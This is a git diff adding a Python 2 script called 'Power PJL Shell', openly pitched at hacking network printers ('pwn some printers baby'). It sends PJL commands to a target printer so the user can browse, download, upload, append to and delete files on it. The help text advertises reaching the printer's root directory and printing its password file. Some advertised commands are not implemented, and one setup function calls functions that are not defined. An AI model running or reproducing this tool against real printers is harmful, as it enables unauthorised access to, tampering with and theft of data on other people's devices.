initial

pjl-shell.py

@@ -0,0 +1,582 @@
+#!/usr/bin/env python
+#
+# printer hacking again in 2012
+# classic 10years after :>
+
+import os
+import sys
+import pjl_func
+
+def usage():
+	version = '0.3'
+	print "Power PJL Shell by dash"
+	print "~pwn some printers baby, version %s" % version
+	print 
+	print
+	print "<host> [<port>]"
+
+def help():
+	#default fs commands
+	print "Power PJL Shell"
+	print
+	print "PJL Commands:"
+	print "cd	<path>		- change directory to path"	
+	print "ls			- list current directory"
+	print "dir			- list current directory"
+	print "get	<file>		- get a file from printer"
+	print "put	<file>		- put file to printer"
+	print "del	<file>		- delete file from printer"
+	print "cat	<file>		- cat a file"
+	print "drive	<drive>		- change to drive(0,1,2,...)"
+	print "mkdir	<dirname>	- create directory(not working?)"
+	print "append	<file>		- append data to a file on printer"
+	print
+
+	#default info commands
+	print "PJL Infos:"
+	print "infosys			- print filesystem information"
+	print "infoconf		- print config information"
+	print "infomem			- info memory"
+	print "infoid			- info id"
+	print "infostat		- info status" 
+	print "infovars		- info variables"
+	print "infoustat		- info ustatus (buggy?!)"
+	print
+
+	#network commands
+	print "Connection Options:"
+	print "open	<printer> <port>- create new connection"
+	print "close			- close connection"
+	print "exit			- leave the shell"
+	print
+
+	#special commands
+	print "Special Commands:"
+	print "!r00tdir		- traverse to / of printer"
+	print "!passwd			- print password file"
+	print "spider	<dir>		- spider printer"
+	print "!hackinfo		- show important data"
+	print
+
+	print "Host Commands:"
+	print "!ls			- print files in ."
+	print "!id			- show id of the current user"
+	print "!! <cmd>		- execute abitrary command"
+	print
+
+
+def prompt(pjl):
+	print "pjl@%s>" % (pjl.path),
+	try:
+		cmd = raw_input()
+	
+	except KeyboardInterrupt:
+		cmd=""
+		print "\nPlease use Exit"
+
+	return cmd
+
+def parseCmd(cmd):
+	print "Command: %s" % cmd
+	c = cmd.split(' ')
+	return c
+
+def executeCmd(pjl,cmd):
+	print "Execute: %s" % cmd
+	cmd0=cmd[0]	
+	if cmd0=="!ls":
+		buf = os.listdir(".")
+		for entry in buf:
+			print entry
+
+	elif cmd0=="!id":
+		buf = os.getuid()
+		print buf
+	
+	elif cmd0=="!!":
+		os.system(cmd[1])
+
+	elif cmd0 == "help":
+		help()
+	elif cmd0 == "?":
+		help()
+	elif cmd0 == "infosys":
+		infoFilesys(pjl)
+
+	elif cmd0 == "infoconf":
+		infoConf(pjl)
+
+	elif cmd0 == "infomem":
+		infoMem(pjl)
+
+	elif cmd0 == "infoid":
+		infoId(pjl)
+
+	elif cmd0 == "infostatus":
+		infoStatus(pjl)
+
+	elif cmd0 == "infovars":
+		infoVars(pjl)
+
+	elif cmd0 == "infoustat":
+		infoUStat(pjl)
+
+	elif cmd0 == "exit":
+		print "Cya"
+	
+	elif cmd0 == "open":
+		#closing the connection
+		pjl.s.close()
+
+		#connecting
+		print "Connecting: %s:%d" % (cmd[1], int(cmd[2]))
+		pjl.host=cmd[1]
+		pjl.port=int(cmd[2])
+		openConnection(pjl)
+
+	elif cmd0 == "close":
+		pjl.s.close()
+
+	elif cmd0 == "drive":
+		if len(cmd)<2:
+			print "drive <which>"
+		else:
+			pjl.drive=cmd[1]
+
+	elif cmd0 == "stat":
+		if len(cmd)<2:
+			print "stat <what>"
+			return
+		fsQuery(pjl,cmd[1])
+
+	elif cmd0 == "mkdir":
+		if len(cmd)<2:
+			print "mkdir <dir>"
+		else:
+			if cmd[1] != ".." and cmd[1]!=".":
+				pjl.dFile=pjl.path+cmd[1]
+				fsMkdir(pjl)
+			else:
+				print "Sorry .. / . not allowed"
+
+	elif cmd0 == "get":
+		if len(cmd)<2:
+			print "get <file>"
+		else:
+			if cmd[1] != ".." and cmd[1]!=".":
+				pjl.size=99999999
+				pjl.dFile=pjl.path+cmd[1]
+				fsUpload(pjl)
+			else:
+				print "Sorry .. / . not allowed"
+
+	elif cmd0 == "cat":
+		if len(cmd)<2:
+			print "cat <file>"
+		else:
+			if cmd[1] != ".." and cmd[1]!=".":
+				pjl.size=99999999
+				pjl.dFile=pjl.path+cmd[1]
+				catFile(pjl)
+			else:
+				print "Sorry .. / . not allowed"
+	elif cmd0 == "spider":
+		if len(cmd)<2:
+			print "spider <dir>"
+		else:
+			if cmd[1] != ".." and cmd[1]!=".":
+				pjl.size=99999999
+				pjl.dFile=pjl.path+cmd[1]
+				save3 = pjl.lDir
+				save2 = pjl.dFile
+				save = pjl.path
+				pjl.walkTree(pjl.dFile)
+				pjl.path=save
+				pjl.dFile = save2
+				pjl.lDir = save3
+			else:
+				print "Sorry .. / . not allowed"
+
+	elif cmd0 == "put":
+		if len(cmd)<2:
+			print "put <file>"
+		else:
+			if cmd[1] != ".." and cmd[1]!=".":
+				pjl.size=99999999
+				pjl.dFile=pjl.path+cmd[1]
+				pjl.hFile=cmd[1]
+				print "Put: [%s]" % pjl.dFile
+				fsDownload(pjl)
+			else:
+				print "Sorry .. / . not allowed"
+
+	elif cmd0 == "append":
+		if len(cmd)<3:
+			print "append <file> <printerfile>"
+		else:
+			if (cmd[1] != ".." and cmd[1]!=".") and (cmd[2]) != ".." and cmd[2] != ".":
+				pjl.size=99999999
+				pjl.dFile=pjl.path+cmd[2]
+				pjl.hFile=cmd[1]
+				print "Put: [%s] to [%s]" % (pjl.hFile,pjl.dFile)
+				fsAppend(pjl)
+			else:
+				print "Sorry .. / . not allowed"
+
+
+	elif cmd0 == "del":
+		if len(cmd)<2:
+			print "del <file>"
+		else:
+			if cmd[1] != ".." and cmd[1]!=".":
+				pjl.size=99999999
+				pjl.dFile=pjl.path+cmd[1]
+				fsDelete(pjl)
+			else:
+				print "Sorry .. / . not allowed"
+
+	elif cmd0 == "dir" or cmd0 == "ls":
+		if len(cmd)<2:
+			fsDirlist(pjl,pjl.lDir)
+		else:
+			saveD = pjl.lDir
+			d = pjl.lDir+cmd[1]
+			fsDirlist(pjl,d)
+			pjl.lDir=saveD
+
+#	elif cmd0 == "ls":
+#		if len(cmd)<2:
+#			fsDirlist(pjl,pjl.lDir)
+#		else:
+#			saveD = pjl.lDir
+#			d = pjl.lDir+cmd[1]
+#			fsDirlist(pjl,d)
+#			pjl.lDir=saveD
+
+	elif cmd0 == "cd":
+		if len(cmd)<2:
+			pjl.lDir=pjl.home
+			pjl.path=pjl.lDir
+		else:
+			saveD = pjl.lDir
+			#here i should check with fsquery if is a dir and i have
+			#permissions to access it
+			if cmd[1] == '.':
+				print "Ok, i stay here."
+				return
+
+			if cmd[1] == '..':
+				tmp = pjl.lDir.split('/')
+				print len(tmp)
+				print tmp
+				a=""
+				for it in range(len(tmp)):
+					#concat as long as its not the last entry
+					#as we want to remove it :)
+					if it+2 != len(tmp):
+						#print it
+						a = "%s%s/" % (a,tmp[it])
+				a = a.replace('//','/')
+				pjl.lDir = a
+				pjl.path = pjl.lDir
+				return 
+
+			elif cmd[1].find('/') == -1:
+				pjl.lDir = pjl.lDir+cmd[1]+"/"
+				pjl.path = pjl.lDir
+				
+			else:
+				pjl.lDir = pjl.lDir+cmd[1]
+				pjl.path = pjl.lDir
+			#if fsquery says its not accessable
+			#pjl.lDir=saveD
+
+
+	else:
+		print "Nothing Baby!"
+
+usage()
+pjl = pjl_func.pjl_commands()
+
+if len(sys.argv)<1:
+	usage()
+elif len(sys.argv)==2:
+	host = sys.argv[1]
+	pjl.host = host
+
+elif len(sys.argv)==3:
+	host = sys.argv[1]
+	port = int(sys.argv[2])
+	pjl.host = host
+	pjl.port = port
+else:
+	print "Erm. What ya doing??"
+	usage()
+	sys.exit(-1)
+
+pjl.saveData="tmp-download.file"
+
+
+def openConnection(pjl):
+	pjl.createSocket(pjl.host,pjl.port)
+	return 0
+
+def infoConf(pjl):
+	pjl.buildRequest("infoconf")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	return 0
+
+def infoFilesys(pjl):
+	pjl.buildRequest("infofsys")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	pjl.parseFSQUERY()
+	return 0
+
+def infoMem(pjl):
+	pjl.buildRequest("infomem")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	return 0
+
+def infoUStat(pjl):
+	pjl.buildRequest("infoustat")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	return 0
+
+def infoVars(pjl):
+	pjl.buildRequest("infovars")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	return 0
+
+def infoStatus(pjl):
+	pjl.buildRequest("infostatus")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	return 0
+
+def infoId(pjl):
+	pjl.buildRequest("infoid")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	return 0
+
+def fsDownload(pjl):
+	#check for local file
+	ss = os.stat(pjl.hFile)
+	ssize = ss[6]
+	print "Filesize: %d" % ssize
+	pjl.upSize=ssize
+	pjl.size=ssize
+
+	pjl.loadFile()
+
+	pjl.buildRequest("fsdownload")
+	pjl.sendRequest(pjl.req)
+	pjl.size=ssize
+
+	#delete buffer
+	pjl.sBuf=""
+	
+	#put the data
+	pjl.sendRequestSelect()
+	print len(pjl.rBuf)
+
+	return 0
+
+def fsDelete(pjl):
+	pjl.buildRequest("fsquery")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	pjl.parseFSQUERY()
+
+	print pjl.dFile
+	print pjl.size
+	print pjl.drive
+
+	pjl.buildRequest("fsdelete")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	
+	return 0
+
+def catFile(pjl):
+	pjl.buildRequest("fsquery")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	pjl.parseFSQUERY()
+	if pjl.error==1:
+		print "Error, file not exist/accessable."
+		return
+	if pjl.ftype == "DIR":
+		return
+
+	pjl.downSize=pjl.size
+
+	pjl.buildRequest("fsupload")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	#delete buffer
+	pjl.rBuf=""
+	
+	#get the data
+	pjl.recvRequestSelect()
+	print len(pjl.rBuf)
+	pjl.parseRequest()
+	print "Cat:\n%s" % pjl.rBuf
+
+	return 0
+
+def fsUpload(pjl):
+	pjl.buildRequest("fsquery")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	pjl.parseFSQUERY()
+	if pjl.error==1:
+		print "Error, file not exist/accessable."
+		return
+
+	pjl.downSize=pjl.size
+
+	pjl.buildRequest("fsupload")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	#delete buffer
+	pjl.rBuf=""
+	
+	#get the data
+	pjl.recvRequestSelect()
+	print len(pjl.rBuf)
+	save = pjl.dFile.replace('/','_')
+	pjl.saveData=save
+	pjl.saveFile()
+
+	return 0
+
+def fsAppend(pjl):
+	ss = os.stat(pjl.hFile)
+	ssize = ss[6]
+	print "Filesize: %d" % ssize
+	pjl.upSize=ssize
+	pjl.size=ssize
+
+	pjl.loadFile()
+
+	pjl.buildRequest("fsappend")
+	pjl.sendRequest(pjl.req)
+	pjl.size=ssize
+	pjl.sBuf=""
+	
+	#put the data
+	pjl.sendRequestSelect()
+	print len(pjl.rBuf)
+
+def fsQuery(pjl,dFile):
+	pjl.dFile=dFile
+	pjl.buildRequest("fsquery")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	pjl.recvRequest()
+	pjl.parseRequest()
+	
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	pjl.parseFSQUERY()
+	return 0
+
+def fsMkdir(pjl):
+	pjl.buildRequest("fsmkdir")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+
+	return 0
+def fsDirlist(pjl,lDir):
+	pjl.lDir=lDir
+	pjl.buildRequest("fsdirlist")
+	pjl.sendRequest(pjl.req)
+	pjl.size=9999999
+	#pjl.recvRequestSelectNormal()
+	pjl.recvRequest()
+	pjl.parseRequest()
+
+	print "Target: %s" % (pjl.host)
+	print "Buffer: %s" % pjl.rBuf
+
+	return 0
+
+def initShell(pjl):
+	openConnection(pjl)
+	infoFilesys(pjl)
+	getDrive(pjl)
+	changeDirectory(pjl)
+	listDirectory(pjl)
+
+
+def putFile(pjl, lfile, rfile):
+	print "implement me"
+	
+cmd=""
+while cmd!="exit":
+	openConnection(pjl)
+	cmd=prompt(pjl)
+	cmddata=parseCmd(cmd)
+	result = executeCmd(pjl,cmddata)
+	pjl.s.close()
+
+